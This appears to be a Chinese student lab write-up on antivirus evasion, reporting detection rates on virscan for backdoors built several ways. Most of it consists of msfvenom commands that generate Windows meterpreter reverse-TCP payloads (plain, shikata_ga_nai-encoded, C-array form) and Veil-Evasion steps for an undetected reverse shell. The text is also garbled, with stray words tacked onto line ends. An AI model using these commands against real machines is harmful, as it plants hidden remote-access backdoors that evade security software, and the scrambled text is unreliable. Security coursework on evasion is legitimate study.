基於行爲的惡意軟件檢測python
免殺即「反-反病毒」/「反殺毒技術」,在這個實驗中可讓安插的後門不被AV軟件發現。shell
經過virscan平臺的幾回實驗,對各種殺毒軟件的靠譜性有了大體的瞭解(雖然可能一些殺軟由於運氣很差被我冤枉了),總的來說,好像外國的殺軟更好用一點啊?咱們平日裏解除的某衛士、某星、某毒霸令我失望。windows
IP地址會有更新。數組
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip PORT=任意 -f exe > met.exe
生成meterpreter可執行文件畢竟是簡單惡意軟件,能夠看出來,仍是不少殺軟發現有病毒的。安全
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met1.exe
生成編碼一次的可執行文件好像能查殺出來的AV稍微少了點哦,不過進步不明顯,仍是要努力啊。tcp
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met2.exe
算了,你們知道就好,咱們的惡意軟件依然沒有多大進步,看來AV對這種軟件的抵抗度很高,畢竟西方哪個國家我沒有去過~編碼
veil-evasion
進入ve界面,輸入use python/meterpreter/rev_tcp
set LHOST
和set LPORT
命令,都設爲kali的,成功界面以下:/var/lib/veil-evasion/output/compiled/
,你們進去本身找一下已經有很大的進步啦,這種方式效果不錯加密
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP LPORT=任意 -f c
生成一個C語言數組很厲害啊,只有幾個殺軟能殺出來了3d